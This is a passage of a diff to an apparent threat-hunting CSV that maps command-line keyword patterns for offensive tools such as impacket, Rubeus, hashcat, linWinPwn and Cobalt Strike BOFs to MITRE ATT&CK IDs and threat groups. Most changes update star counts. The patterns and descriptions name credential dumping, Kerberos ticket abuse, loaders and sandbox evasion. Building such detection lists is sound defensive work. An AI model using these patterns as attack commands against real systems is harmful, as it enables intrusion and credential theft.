Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* -dc-host * -spn * -impersonate *","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","262","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" -"* -dc-ip * -so *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* -dc-ip * -computer-pass *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* -dc-ip * -dump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -dc-ip * -impersonate *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* --dc-ip * -request * -format hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18342","2659","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" -"* -dc-ip * -target-ip *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* --dc-ip * --vuln --enabled*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -dc-ip *SAMDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -dc-ip * -so *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -dc-ip * -computer-pass *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -dc-ip * -dump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -dc-ip * -impersonate *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* --dc-ip * -request * -format hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" +"* -dc-ip * -target-ip *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* --dc-ip * --vuln --enabled*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -dc-ip *SAMDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* dcow.c *","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "* dcow.cpp*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/gbonacini/CVE-2016-5195","1","0","N/A","N/A","3","289","122","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z" -"* -DDONUT_EXE *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* -DDONUT_EXE *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "* --deauth * -a TR:GT:AP:BS:SS:ID wlan*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* decrypt *.aes.zip*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"* decrypt *.aes.zip*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "* deepce.sh *--install*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* default_logins.txt*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"* default_logins.txt*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" "* Defense_Evasion.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "* DelegationBOF.c *","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "* delegationx64.o*","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "* delegationx86.o*","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "* deluge-rpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1321","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"* demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "* Dendron.exe*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "* deploy_cobalt_beacon*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "* DesertFox.go","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" @@ -443,14 +443,14 @@ "* detect-hooks.c *","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","0","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "* dhcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* diagrun=true service=DNS* dllpath=*.dll* computername=*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" -"* diamond * /certificate:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* diamond /tgtdeleg *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* diamond /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* diamond * /certificate:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* diamond /tgtdeleg *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* diamond /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* dicom-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dicom-ping.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dict-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* DInvokeResolver.*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"* --dirnames bank financ payable payment reconcil remit voucher vendor eft swift *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" +"* --dirnames bank financ payable payment reconcil remit voucher vendor eft swift *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - 